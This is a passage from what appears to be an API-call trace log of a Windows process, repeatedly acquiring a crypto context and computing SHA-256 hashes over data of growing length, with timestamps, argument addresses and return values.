pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.255] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e3560, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e3560, pdwDataLen=0x1ee448) returned 1 [0262.255] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.255] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.255] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.255] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.255] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x120, dwFlags=0x0) returned 1 [0262.255] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.255] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e3590, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e3590, pdwDataLen=0x1ee448) returned 1 [0262.255] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.255] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.256] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.256] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.256] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x140, dwFlags=0x0) returned 1 [0262.256] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.256] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e35c0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e35c0, pdwDataLen=0x1ee448) returned 1 [0262.256] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.256] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.256] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.257] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.257] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x160, dwFlags=0x0) returned 1 [0262.257] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.257] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2a9ea0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2a9ea0, pdwDataLen=0x1ee448) returned 1 [0262.257] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.257] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.257] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.258] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.258] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x180, dwFlags=0x0) returned 1 [0262.258] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.258] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e33e0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e33e0, pdwDataLen=0x1ee448) returned 1 [0262.258] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.258] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.258] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.259] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.259] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x1a0, dwFlags=0x0) returned 1 [0262.259] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.259] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e4650, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e4650, pdwDataLen=0x1ee448) returned 1 [0262.259] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.259] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.259] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.260] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.260] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x1c0, dwFlags=0x0) returned 1 [0262.260] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.260] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e46b0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e46b0, pdwDataLen=0x1ee448) returned 1 [0262.260] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.260] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.260] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.260] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.261] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x1e0, dwFlags=0x0) returned 1 [0262.261] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.261] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e46e0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e46e0, pdwDataLen=0x1ee448) returned 1 [0262.261] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.261] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.261] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.261] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.261] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x200, dwFlags=0x0) returned 1 [0262.261] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.261] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e4710, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e4710, pdwDataLen=0x1ee448) returned 1 [0262.262] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.262] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.262] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.262] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.262] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x220, dwFlags=0x0) returned 1 [0262.262] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.262] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e4740, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e4740, pdwDataLen=0x1ee448) returned 1 [0262.262] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.262] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.262] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.263] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.263] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x240, dwFlags=0x0) returned 1 [0262.263] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.263] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e4770, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e4770, pdwDataLen=0x1ee448) returned 1 [0262.263] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.263] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.263] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.264] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.264] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x260, dwFlags=0x0) returned 1 [0262.264] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.264] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e47a0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e47a0, pdwDataLen=0x1ee448) returned 1 [0262.264] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.264] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.264] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.265] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.265] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x280, dwFlags=0x0) returned 1 [0262.265] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.265] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e47d0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e47d0, pdwDataLen=0x1ee448) returned 1 [0262.265] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.265] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.265] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.266] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.266] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x2a0, dwFlags=0x0) returned 1 [0262.266] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.266] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e4800, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e4800, pdwDataLen=0x1ee448) returned 1 [0262.266] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.266] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.266] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.266] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.266] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x2c0, dwFlags=0x0) returned 1 [0262.266] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.267] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e4830, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e4830, pdwDataLen=0x1ee448) returned 1 [0262.267] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.267] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.267] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.267] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.267] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x2e0, dwFlags=0x0) returned 1 [0262.267] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.267] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e4860, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e4860, pdwDataLen=0x1ee448) returned 1 [0262.267] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.267] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.268] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.268] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.268] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x300, dwFlags=0x0) returned 1 [0262.268] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.268] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e4890, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e4890, pdwDataLen=0x1ee448) returned 1 [0262.268] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.268] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.268] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.269] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.269] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x320, dwFlags=0x0) returned 1 [0262.269] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.269] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e48c0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e48c0, pdwDataLen=0x1ee448) returned 1 [0262.269] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.269] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.269] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.270] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.270] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x340, dwFlags=0x0) returned 1 [0262.270] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.270] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e48f0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e48f0, pdwDataLen=0x1ee448) returned 1 [0262.270] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.270] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.270] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.271] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.271] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x360, dwFlags=0x0) returned 1 [0262.271] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.271] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e4920, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e4920, pdwDataLen=0x1ee448) returned 1 [0262.271] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.271] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.271] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.272] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.272] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x380, dwFlags=0x0) returned 1 [0262.272] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.272] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e4950, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e4950, pdwDataLen=0x1ee448) returned 1 [0262.272] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.272] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.272] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.272] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.272] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x3a0, dwFlags=0x0) returned 1 [0262.272] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.272] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e4980, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e4980, pdwDataLen=0x1ee448) returned 1 [0262.272] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.273] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.273] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.273] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.273] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x3c0, dwFlags=0x0) returned 1 [0262.273] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.273] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e49b0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e49b0, pdwDataLen=0x1ee448) returned 1 [0262.273] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.273] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.274] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.274] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.274] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x3e0, dwFlags=0x0) returned 1 [0262.274] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.274] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e49e0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e49e0, pdwDataLen=0x1ee448) returned 1 [0262.274] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.274] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.274] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.275] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.275] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x400, dwFlags=0x0) returned 1 [0262.275] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.275] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e4a10, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e4a10, pdwDataLen=0x1ee448) returned 1 [0262.275] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.275] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.275] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.276] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.276] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x420, dwFlags=0x0) returned 1 [0262.276] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.276] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e4a40, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e4a40, pdwDataLen=0x1ee448) returned 1 [0262.276] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.276] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.276] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.277] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.277] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x440, dwFlags=0x0) returned 1 [0262.277] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.277] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e4a70, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e4a70, pdwDataLen=0x1ee448) returned 1 [0262.277] CryptDestroyHash (hHash=0x2a5c40) returned 1 [0262.277] CryptReleaseContext (hProv=0x2c50e0, dwFlags=0x0) returned 1 [0262.277] CryptAcquireContextW (in: phProv=0x1ee400, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ee400*=0x2c50e0) returned 1 [0262.277] CryptCreateHash (in: hProv=0x2c50e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1ee3f8 | out: phHash=0x1ee3f8) returned 1 [0262.278] CryptHashData (hHash=0x2a5c40, pbData=0x2e3610, dwDataLen=0x460, dwFlags=0x0) returned 1 [0262.278] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x4, pbData=0x1ee448, pdwDataLen=0x1ee3f0, dwFlags=0x0 | out: pbData=0x1ee448, pdwDataLen=0x1ee3f0) returned 1 [0262.278] CryptGetHashParam (in: hHash=0x2a5c40, dwParam=0x2, pbData=0x2e4aa0, pdwDataLen=0x1ee448, dwFlags=0x0 | out: pbData=0x2e4aa0, 